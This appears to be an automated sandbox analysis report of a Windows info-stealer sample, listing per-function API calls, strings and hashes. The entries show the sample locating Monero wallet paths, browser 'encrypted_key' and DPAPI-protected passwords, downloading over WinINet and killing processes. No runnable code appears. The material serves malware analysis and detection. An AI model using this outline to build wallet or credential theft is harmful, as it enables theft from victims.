                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                            • String ID: Password
                            • API String ID: 356768136-3434357891
                            • Opcode ID: c97bd54a08b7718c5d89ed13946f82f00ffdaefeb1483a3fc9d9f395689699b0
                            • Instruction ID: 0d3b02acf1a413268f8605a260030034a78f49bf0633b9483ddb82fd7865b321
                            • Opcode Fuzzy Hash: c97bd54a08b7718c5d89ed13946f82f00ffdaefeb1483a3fc9d9f395689699b0
                            • Instruction Fuzzy Hash: 8C7150B1D0421DAFDB50DF94DC80AEEBBB9EF49300F1045AAE609A7340EB315A85CB95
                            Function 006D1120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006D1135
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006D113C
                            • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 006D1159
                            • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 006D1173
                            • RegCloseKey.ADVAPI32(?), ref: 006D117D
                            Strings
                            • SOFTWARE\monero-project\monero-core, xrefs: 006D114F
                            • wallet_path, xrefs: 006D116D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                            • API String ID: 3225020163-4244082812
                            • Opcode ID: f5de13c2cebf279b44ceb63b6f486d668609752e5ac0cc1c6fd61ca978c8742f
                            • Instruction ID: 062504ff3a9730d16aca8a07a0860a7bd79ae2dacb95b26d1c90b54ccafd3ed5
                            • Opcode Fuzzy Hash: f5de13c2cebf279b44ceb63b6f486d668609752e5ac0cc1c6fd61ca978c8742f
                            • Instruction Fuzzy Hash: 82F067B5A40309FFE7009BA0AC4EFEB7B7CEB04715F000155BF05E6281EAB05A4497A0
                            Function 006D9DE0 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 183memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • memcmp.MSVCRT(?,v20,00000003), ref: 006D9E04
                            • memcmp.MSVCRT(?,v10,00000003), ref: 006D9E42
                            • LocalAlloc.KERNEL32(00000040), ref: 006D9EA7
                              • Part of subcall function 006F71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006F71FE
                            • lstrcpy.KERNEL32(00000000,00704C48), ref: 006D9FB2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpymemcmp$AllocLocal
                            • String ID: @$v10$v20
                            • API String ID: 102826412-278772428
                            • Opcode ID: 64152661e08c17e7e4f458bf8be6c286fe2eae38dad3fef99b3279d0c00809c7
                            • Instruction ID: 59006f12fbca8c1452b57867ae0de89bf7ad8c10c41788fe1472ae0f04170bef
                            • Opcode Fuzzy Hash: 64152661e08c17e7e4f458bf8be6c286fe2eae38dad3fef99b3279d0c00809c7
                            • Instruction Fuzzy Hash: 4A51B0B1E102199BDB20EF65DC41BDE77A6EF50314F15412AFA09EB341DB74ED058BA0
                            Function 006D5640 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 006D565A
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006D5661
                            • InternetOpenA.WININET(006FCFEC,00000000,00000000,00000000,00000000), ref: 006D5677
                            • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 006D5692
                            • InternetReadFile.WININET(?,?,00000400,00000001), ref: 006D56BC
                            • memcpy.MSVCRT(00000000,?,00000001), ref: 006D56E1
                            • InternetCloseHandle.WININET(?), ref: 006D56FA
                            • InternetCloseHandle.WININET(00000000), ref: 006D5701
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                            • String ID:
                            • API String ID: 1008454911-0
                            • Opcode ID: a5b490f1da90d15d0c011c4762620bbff2c743894d66d196f66972e2400b457c
                            • Instruction ID: 28a8753452fa33f4445193c4c2a0501ba4b04d2eb9432339c5aa4c2a16833af7
                            • Opcode Fuzzy Hash: a5b490f1da90d15d0c011c4762620bbff2c743894d66d196f66972e2400b457c
                            • Instruction Fuzzy Hash: 89419170E00605EFDB14CF64DD88FAAB7B5FF48301F2480AAEA199B3A1D7719941CB94
                            Function 006F4740 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 006F4759
                            • Process32First.KERNEL32(00000000,00000128), ref: 006F4769
                            • Process32Next.KERNEL32(00000000,00000128), ref: 006F477B
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006F479C
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 006F47AB
                            • CloseHandle.KERNEL32(00000000), ref: 006F47B2
                            • Process32Next.KERNEL32(00000000,00000128), ref: 006F47C0
                            • CloseHandle.KERNEL32(00000000), ref: 006F47CB
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 3836391474-0
                            • Opcode ID: 178af53ea7094468c926e523db4af27abb974529bde367ab4820e17d79da8e01
                            • Instruction ID: 3864e96b4f2229fe547b3e54d496356d8de7691c2a464741362e18dd697d9903
                            • Opcode Fuzzy Hash: 178af53ea7094468c926e523db4af27abb974529bde367ab4820e17d79da8e01
                            • Instruction Fuzzy Hash: E001B171615219AFE7206B709C8DFFB77BDEB08B52F000190FB49E1281EF708D909AA0
                            Function 006E83E0 Relevance: 10.6, APIs: 7, Instructions: 147stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 006E8435
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E846C
                            • lstrlen.KERNEL32(00000000), ref: 006E84B2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E84E9
                            • lstrlen.KERNEL32(00000000), ref: 006E84FF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E852E
                            • StrCmpCA.SHLWAPI(00000000,00704C3C), ref: 006E853E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 05714bd08e4259ea9eca268396b04c1337b4198ac6fd3a9d075545bea3a94c58
                            • Instruction ID: e31a31b6ee78ac80f05492eb0b7330c933628c44587ac985869c91b2bc3b7d80
                            • Opcode Fuzzy Hash: 05714bd08e4259ea9eca268396b04c1337b4198ac6fd3a9d075545bea3a94c58
                            • Instruction Fuzzy Hash: 14518F719112469FCB60DF6AD894A9BB7FAEF58300F148459EC8ADB345EF30D9418B90
                            Function 006F2910 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 006F2925
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006F292C
                            • RegOpenKeyExA.ADVAPI32(80000002,0100BBF8,00000000,00020119,006F28A9), ref: 006F294B
                            • RegQueryValueExA.ADVAPI32(006F28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 006F2965
                            • RegCloseKey.ADVAPI32(006F28A9), ref: 006F296F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: 9fec511c62196403fbf4c2f4ea86904d59d366d36c197abdf03877293cbc9a3c
                            • Instruction ID: 9487a5e161a0fd911e05272df23f5bf659ce0dfb6cf021b258fce7f0dc6f296b
                            • Opcode Fuzzy Hash: 9fec511c62196403fbf4c2f4ea86904d59d366d36c197abdf03877293cbc9a3c
                            • Instruction Fuzzy Hash: FF01DF7560431AAFD710CBA0DC69EFB7BBCEB49711F104098FF85DB281EA7159048BA0
                            Function 006F2880 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 006F2895
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006F289C
                              • Part of subcall function 006F2910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 006F2925
                              • Part of subcall function 006F2910: RtlAllocateHeap.NTDLL(00000000), ref: 006F292C
                              • Part of subcall function 006F2910: RegOpenKeyExA.ADVAPI32(80000002,0100BBF8,00000000,00020119,006F28A9), ref: 006F294B
                              • Part of subcall function 006F2910: RegQueryValueExA.ADVAPI32(006F28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 006F2965
                              • Part of subcall function 006F2910: RegCloseKey.ADVAPI32(006F28A9), ref: 006F296F
                            • RegOpenKeyExA.ADVAPI32(80000002,0100BBF8,00000000,00020119,006E9500), ref: 006F28D1
                            • RegQueryValueExA.ADVAPI32(006E9500,0101F7A8,00000000,00000000,00000000,000000FF), ref: 006F28EC
                            • RegCloseKey.ADVAPI32(006E9500), ref: 006F28F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: 29d298cfef210f73d68977abfec04457cd0397e5f9028ceef0f895d49f033742
                            • Instruction ID: 2efcf375a605ee69b2e87e86ec32b13e0b4649f7091d28bf5a0bee845d02292b
                            • Opcode Fuzzy Hash: 29d298cfef210f73d68977abfec04457cd0397e5f9028ceef0f895d49f033742
                            • Instruction Fuzzy Hash: B601AD71B14219BFEB109BB4AC4DEBB777DEB44311F004158FF48D6291DA709944ABE0
                            Function 006D71F0 Relevance: 9.1, APIs: 6, Instructions: 142memorylibraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(?), ref: 006D723E
                            • GetProcessHeap.KERNEL32(00000008,00000010), ref: 006D7279
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006D7280
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 006D72C3
                            • HeapFree.KERNEL32(00000000), ref: 006D72CA
                            • GetProcAddress.KERNEL32(00000000,?), ref: 006D7329
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                            • String ID:
                            • API String ID: 174687898-0
                            • Opcode ID: 4a01b2d5ce95a469e310353bebc314f5ee2bff375c2b55748cff6eb069ab1092
                            • Instruction ID: e4ce308757b54e297030fc1fe4e3756c9d723c4aa2570d8506befccca981d5ca
                            • Opcode Fuzzy Hash: 4a01b2d5ce95a469e310353bebc314f5ee2bff375c2b55748cff6eb069ab1092
                            • Instruction Fuzzy Hash: B7414B71B056069BDB20CF69DC84BAAB3EAEB89305F1445AAEC49C7311E631E9009B51
                            Function 006D9C70 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 124memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 006D9CA8
                            • LocalAlloc.KERNEL32(00000040,?), ref: 006D9CDA
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 006D9D03
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2746078483-738592651
                            • Opcode ID: 4e20f4090cea08b232473124debfcc0076a63490e68934eca79f03769692aa8a
                            • Instruction ID: 7b7c7e929c5860c5463586fdff39772fee558f1483d18b048865292f3acd4693
                            • Opcode Fuzzy Hash: 4e20f4090cea08b232473124debfcc0076a63490e68934eca79f03769692aa8a
                            • Instruction Fuzzy Hash: 7341F271E1021A9BCB24EF65DC416EFB7B7EF54304F08546AE915AB352DA30ED00C7A0
